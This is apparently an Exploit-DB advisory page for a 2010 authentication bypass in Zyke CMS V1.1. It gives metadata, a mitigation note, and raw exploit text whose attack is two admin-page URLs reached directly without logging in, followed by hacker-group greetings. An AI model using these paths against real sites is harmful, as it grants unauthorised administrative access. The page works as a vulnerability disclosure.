header-logo
Suggest Exploit
vendor:
Zyke CMS
by:
indoushka
7,5
CVSS
HIGH
By pass
287
CWE
Product Name: Zyke CMS
Affected Version From: V1.1
Affected Version To: V1.1
Patch Exists: YES
Related CWE: N/A
CPE: a:zyke_cms:zyke_cms:1.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux
2010

Zyke CMS V1.1 By pass Vulnerability

A vulnerability in Zyke CMS V1.1 allows an attacker to bypass authentication and gain access to the admin panel. The vulnerability exists due to insufficient validation of user-supplied input. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. This may allow the attacker to gain access to the admin panel without authentication.

Mitigation:

Apply the latest security patches to the Zyke CMS V1.1 application and ensure that all user input is properly validated.
Source

Exploit-DB raw data:

========================================================================================                  
| # Title    : Zyke CMS V1.1 By pass Vulnerability           
| # Author   : indoushka                                                               
| # email    : indoushka@hotmail.com                                                   
| # Home     : www.iqs3cur1ty.com/vb                                                                                                                                                                                                             
| # Script   : Powered by ZykeCMS 2010       
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)       
| # Bug      : By pass  
| # Download : freewebtown.com/indoushka                                                                  
======================      Exploit By indoushka       =================================
 # Exploit  : 
 
http://127.0.0.1/ZykeCMSV1.1/admin/home.php

http://127.0.0.1/ZykeCMSV1.1/admin/generalsettings.php

Dz-Ghost Team ===== Saoucha * Star08 * Redda * theblind74 * XproratiX * onurozkan * n2n * Meher Assel ====================
Greetz : 
Exploit-db Team : 
(loneferret+Exploits+dookie2000ca)
all my friend :
His0k4 * Hussin-X * Rafik (www.Tinjah.com) * Yashar (www.sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc)
Stake (www.v4-team.com) * r1z (www.sec-r1z.com) * D4NB4R http://www.ilegalintrusion.net/foro/
www.securityreason.com * www.sa-hacker.com *  www.alkrsan.net * www.mormoroth.net * MR.SoOoFe * ThE g0bL!N
------------------------------------------------------------------------------------------------------------------------